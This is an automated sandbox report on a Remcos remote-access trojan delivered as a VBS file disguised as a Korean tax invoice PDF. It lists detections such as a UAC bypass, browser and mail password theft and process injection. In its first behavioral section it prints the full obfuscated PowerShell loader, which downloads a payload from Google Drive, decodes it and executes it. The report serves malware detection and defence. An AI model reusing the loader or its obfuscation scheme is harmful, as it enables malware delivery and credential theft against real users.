Malware Analysis Report

2024-12-01 03:05

Sample ID 241111-a1791axqhx
Target 26e43271d698c8a1fcc996749109f77b779dd533dc0813513278947db90477b9
SHA256 26e43271d698c8a1fcc996749109f77b779dd533dc0813513278947db90477b9
Tags
discovery remcos remotehost collection credential_access evasion rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

26e43271d698c8a1fcc996749109f77b779dd533dc0813513278947db90477b9

Threat Level: Known bad

The file 26e43271d698c8a1fcc996749109f77b779dd533dc0813513278947db90477b9 was found to be: Known bad.

Malicious Activity Summary

discovery remcos remotehost collection credential_access evasion rat stealer trojan

UAC bypass

Remcos

Remcos family

Detected Nirsoft tools

NirSoft MailPassView

NirSoft WebBrowserPassView

Uses browser remote debugging

Blocklisted process makes network request

Checks computer location settings

Accesses Microsoft Outlook accounts

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

System Network Configuration Discovery: Internet Connection Discovery

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Modifies registry key

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: MapViewOfSection

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-11 00:41

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-11 00:41

Reported

2024-11-11 00:44

Platform

win7-20240708-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\전자세금계산서·pdf.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\전자세금계산서·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Undiscriminatingness Vodun Hervards Folkefrontsregeringen Carmakers #><#Polyhedrons Versionsnavnenes Baalets Quadrennially Catarines Recondite #>$Disleaf100='Mrtel';function Moderates7($Trdestens){If ($host.DebuggerEnabled) {$Flood++;$effectualnesses=$Trdestens.'Length' - $Flood} for ( $Foelelsen=4;$Foelelsen -lt $effectualnesses;$Foelelsen+=5){$Brillanters151=$Foelelsen;$Sippingly+=$Trdestens[$Foelelsen]}$Sippingly}function forsrgelseskommunernes($Primrfilers){ .($Modkandidaten) ($Primrfilers)}$Lossen=Moderates7 'Forgn KnoeGe,vtBist.Jeh w Vs.EEndybUnsecAlkol,eroIAspieSandn Re.Tco n ';$Splanchnopleure=Moderates7 'Kl.tM iaoK.gezTugti ClelFormlPrewaBac /Redi ';$flintres=Moderates7 ' sogTOrgalSupesColp1Unus2 ryn ';$Kliniskes='Mail[Rac,NGluce SquTOmsi.StresParneBasiR L mv kerIHe,sC Ko etwelPUnesOCe tiR giNPolyT amuMa,baASashng teAGenfG AirEAngrr ent]B ug: Ryk:,eenSDogseMar,cBet.U olsROm yI rigTPyrrYFl.nPclavr Couo FortMedio beecCharoSp oL ,ev=stud$OpspfBioglTummi ormN Sn.TParlrUlykeOf dSMoze ';$Splanchnopleure+=Moderates7 ' aje5Cas .fors0Skar T sk( imiW,okuiOrddnDo.adsteroAy twF,apsNu z V,nNchroTErob rot 1Cens0Type.Prod0Hove;Te r SensW nci Keln B.a6 Rec4Fakt;Dile MichxUdfo6Gyld4Klor;Exhu UnmrRentvtext: es1 Ill3Eret1aper.None0Reve) Ant Cu.GProgeP rocpalikRn,eo Hai/ .ap2,ede0 Ful1E,in0 Bu 0cata1Ud,l0,ovn1Li.p RevoFP.ntiSalgrTurbeSl gfakt o A txf ls/ Pec1N vl3De.e1Len .Nic 0Dipl ';$Umodenhedens246=Moderates7 'Ss.euLuneSMultEA roRComi-DkssAPadagSymmEPl tNSolltSted ';$Tallit=Moderates7 'R.buhPondtGud tThurpImpusAfse:Chid/anas/kr,pdDobbrTruci Cr,v Plue eng.Uds,gTayioTradoel kgImmalS.gne ush.Leibc SkroBorrmAn i/SquauBru,c.ors?PerreI loxNonspPreso Omsr ventQuod=PluvdSulpo BlewDiscnarenlNeuro Disa MoldImpr&Ph,sibungd kor=Karr1Siph1kejs6EsopG tepeBortVKlipSBeelxO tjaforu7StarC tifmMelo0 .esvFlorf M,lwMu.r2 Up zOve t EnapT,fnBEquimsaggqTa aL Bie8DialUVariy Me,A,orsNPancdC muA ap_Topao eal ';$Udfrselsforbuddets=Moderates7 'Quar>,yan ';$Modkandidaten=Moderates7 ' MidiGua EFes xDo e ';$Par='Problemfrit';$Skridfastes='\Banebryderes.Non';forsrgelseskommunernes (Moderates7 '.den$F kagLogalPagiOTem bF,miA arLP,is: Faxe C,nsRej rBeg o CurgS,egsEndo= ymn$Mas eKnleNCracV Cli:Le.saSkaaP Medp irsdN.npA Inft ho aBism+T mm$TranSWaivKMlkeREkspIRecrdUdprFOverARi oSUdbyT soEGropsFil ');forsrgelseskommunernes (Moderates7 'Andr$SeveGSkurlMks.O nsBFordAA baLCe.s:TidsCs enrPersoSammTKli aPirqp rimhEnthI Gauo RednBrnd=Efte$FisstTrinAVeinLE taLProtiHereT Per.DobbSS,eaP atal C,eIHypoTFras(Til.$U inuUnmuD ameF uborUvejSUroceHalel MooSDsleFPar,OH.ikRtopfbBogpu heDRaadD FriELapaT orss Dat)S,ot ');forsrgelseskommunernes (Moderates7 $Kliniskes);$Tallit=$Crotaphion[0];$Mytologiers=(Moderates7 'Preg$FodngIndklBlodoOpd,B alaDesslWarm:di essvmmITeleLKarrjRe mAHankSPort=CellNSkrieFadeW K,i-,lado D bB ArbJAsice CatCd,rmTHngt .ncrSVareyReacs E stUskaenutiMM lo. Art$ TriLFatto zygsGlauSpatcE ropnOv r ');forsrgelseskommunernes ($Mytologiers);forsrgelseskommunernes (Moderates7 'halv$UnfoSForriWooll refjKajaaA unsLigh.Cou.H ngeeVandaOu.tdT lbe afrr,allsdest[,epa$,ntaUI,gem TjroHidsdLarmeCycanAfbrhUvaneRoerd Do eFa.tnA,tisUsmm2 Fal4Resr6 Fe,] Eng=Bear$SkadS KetpAutolR,baa RepnTro csarahEpocn,agso wepOrdelskileAno upla r ndeFdre ');$Rumpadder=Moderates7 'Radi$SessSbi ti S,nlU etjfro a OopsUdfr.Unw DR ugoAutow azan koblscraoSpidaMaa dJarvFPoesiS bslTaveePros(Soci$,ourTForea Fril R nlThioi SubtRefu,To p$EutyV alvaBasnmSupesUrok)Goat ';$Vams=$Esrogs;forsrgelseskommunernes (Moderates7 'Flas$Photg,ontlAlimoDanuBHonnaZ ielLa d:SkrapInp R StrIOystoVo,eR BrniIgant.eriemazaT Ales udsRStryk Pyck ase draf NaiLVindG.ncoeUnde=C ma(DesatLi rE RedsEksptDege-F empCirkamangtVernhLekt Busf$skriVSladaPeccM.ortsMeso)Tils ');while (!$Prioritetsrkkeflge) {forsrgelseskommunernes (Moderates7 'Reri$TaargBanelMi toindpb F mareselTerm:YusdMMoraaFinapKlerpC.pteBillrEcho=Post$BrnetEmmer.lagu Drie rei ') ;forsrgelseskommunernes $Rumpadder;forsrgelseskommunernes (Moderates7 'BromsRespTVelsaTierRSta tStre- MovSInteLArcheKuldeundfp.qui Gran4Disa ');forsrgelseskommunernes (Moderates7 'Numm$UnreG AsmLOutsoM ltb lumA.ellL.ale: A sPLiftrOrnai irco ThaR,mbriFerrTSha eMeddtNonlsobskRF euKAn rKHandEKol,f IntL P.pg.ynfe,rab=Pist(Hus,tsys.e mansStjkTEksp- alpNataAOptoTModeHTord Anf$SupeV.ndka AntMOvers Jv.)Pann ') ;forsrgelseskommunernes (Moderates7 'sw n$SexgGAposLLideOEl ebunpeANonsLSita:MispR DrueSalvPTil EInderPhotKSe i= Lud$GromgG rnlElatO TriBTheoaMillL Exu:P ela Hetu allGUkbuUjoggSLizetAssuSAcetNCha D iera Ma,gBnkh+ko p+Tere%Pree$ lsdC FhorIsomoPerit BreaForeP GreHKoloiMicro lgtNGasa.Ret C ropoPounuMalmnAlumtNons ') ;$Tallit=$Crotaphion[$Reperk]}$poncho=321965;$Yawn=30428;forsrgelseskommunernes (Moderates7 'Elfo$Stefg UnbLCiliO C eBverdA DatLmela:PlejNAffueEnemPiridHhrecrIrr e DefCinditRoduAForeSSneaIEvapa Ye Chac=Proe BakuGS,iceTvist dr-meascBassORa iN.leuT Ture Tann JerTnrin yd r$S.ndVStruA yrmS.lss us ');forsrgelseskommunernes (Moderates7 'Udeb$ForbgCheel.enaoBirrbFor a.bdulHvil:DokuEMulmx KamsFolkeChokrRevitReunsHjfo Con =Bekl Ha.i[ InjSApriySirpsS lhtIndde Form Akk.BippC OveoFljdnarguvCu ue.nuer ToptMisp] Sot:Serv:BaadFKenirShunoIn emG,veB,eroaPasssAn.meCann6 len4InanSA oxtArcurGi tiOutlnAfragU de( Att$OogeNfugueVanlpUns,hRonirAn.ueAp rcRaditElekaTusksSpitiForvabegr)Bane ');forsrgelseskommunernes (Moderates7 'Vaga$ onGProclParaOUre BSilvaVestlPapi: S.rsDe omO,snAInamaZ naFK,nseInefj,ugsLMerssDoor Camo= Mon Str[Fa,ssRtehyEkspsDelttrecieFladMForb.ArbeTBezoE,vigX VdeT Chi.BeefECinnN roccBeskoFormd,rumiIn oNL anGBu l]Pare:bygn:MongA P fsPyraCOpbliCin.IBema.Ome gHinge GenT UdvsHumrtInfarVil ITilhNUsliGF,tt(Macr$D,ueE Lo xPhocs leENonerar.et.eleSMell)Afs ');forsrgelseskommunernes (Moderates7 'Rusl$syl GDerfl aphOQuasbB.spABundlF it:Te.bot ktP KomPBeleIGr,yGJapaN ImpoLemaRsid a V.dT,oveESpio=Me e$FabrsAbelmHyd AR dhAStilf Ov eF,reJSyndL finS T v.PaspSSkyhusig BRecosTlpetBl dRc uniSangn NonG Cha(Lill$trosPR.maOStyln.ericO,sth,nfrO al.,Geog$Skn.YTvrfaRuggwNewsnToha) onc ');forsrgelseskommunernes $Oppignorate;"

Network

Files

C:\Users\Admin\AppData\Local\Temp\CabAFB2.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2012-20-0x000007FEF625E000-0x000007FEF625F000-memory.dmp

memory/2012-22-0x0000000002890000-0x0000000002898000-memory.dmp

memory/2012-21-0x000000001B510000-0x000000001B7F2000-memory.dmp

memory/2012-23-0x000007FEF5FA0000-0x000007FEF693D000-memory.dmp

memory/2012-24-0x000007FEF5FA0000-0x000007FEF693D000-memory.dmp

memory/2012-25-0x000007FEF5FA0000-0x000007FEF693D000-memory.dmp

memory/2012-26-0x000007FEF5FA0000-0x000007FEF693D000-memory.dmp

memory/2012-27-0x000007FEF625E000-0x000007FEF625F000-memory.dmp

memory/2012-28-0x000007FEF5FA0000-0x000007FEF693D000-memory.dmp

memory/2012-29-0x000007FEF5FA0000-0x000007FEF693D000-memory.dmp

memory/2012-30-0x000007FEF5FA0000-0x000007FEF693D000-memory.dmp

memory/2012-31-0x000007FEF5FA0000-0x000007FEF693D000-memory.dmp

memory/2012-32-0x000007FEF5FA0000-0x000007FEF693D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-11 00:41

Reported

2024-11-11 00:44

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

137s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\전자세금계산서·pdf.vbs"

Signatures

Remcos

rat remcos

Remcos family

remcos

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2488 set thread context of 1920 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2488 set thread context of 1076 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2488 set thread context of 512 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2148 wrote to memory of 1860 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2148 wrote to memory of 1860 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4628 wrote to memory of 2488 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 4628 wrote to memory of 2488 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 4628 wrote to memory of 2488 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 4628 wrote to memory of 2488 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 2488 wrote to memory of 696 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 2488 wrote to memory of 696 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 2488 wrote to memory of 696 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 696 wrote to memory of 3564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 696 wrote to memory of 3564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 696 wrote to memory of 3564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2488 wrote to memory of 2232 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2488 wrote to memory of 2232 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 3632 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 3632 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2488 wrote to memory of 1920 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2488 wrote to memory of 1920 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2488 wrote to memory of 1920 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2488 wrote to memory of 1920 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2488 wrote to memory of 1076 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2488 wrote to memory of 1076 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2488 wrote to memory of 1076 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2488 wrote to memory of 1076 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2488 wrote to memory of 512 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2488 wrote to memory of 512 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2488 wrote to memory of 512 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2488 wrote to memory of 512 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
